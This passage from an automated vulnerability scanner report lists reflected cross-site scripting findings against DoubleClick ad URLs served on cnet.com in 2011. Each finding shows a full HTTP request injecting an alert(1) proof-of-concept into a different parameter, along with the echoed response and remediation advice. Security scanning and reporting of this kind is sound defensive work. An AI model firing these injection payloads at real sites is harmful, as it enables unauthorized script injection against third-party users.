Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd82a"-alert(1)-"527f20e513 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2cd82a"-alert(1)-"527f20e513&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3af6/17/152/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2cd82a"-alert(1)-"527f20e513&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJ
...[SNIP]...

3.206. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pdom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6142"-alert(1)-"256dabadf78 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.comf6142"-alert(1)-"256dabadf78&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.comf6142"-alert(1)-"256dabadf78&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm
...[SNIP]...

3.207. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e15d"-alert(1)-"86cedb662e5 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@6e15d"-alert(1)-"86cedb662e5&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
ite=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@6e15d"-alert(1)-"86cedb662e5&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094144_240360897_41852066");
var wmode = "opaque";
...[SNIP]...

3.208. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 904b8"-alert(1)-"9c8a7d52c2b was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=904b8"-alert(1)-"9c8a7d52c2b&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=904b8"-alert(1)-"9c8a7d52c2b&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&
...[SNIP]...

3.209. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 801e3"-alert(1)-"324ce86438a was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100801e3"-alert(1)-"324ce86438a&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100801e3"-alert(1)-"324ce86438a&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http
...[SNIP]...

3.210. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [ppartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fedf"-alert(1)-"f027a765496 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=5fedf"-alert(1)-"f027a765496&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&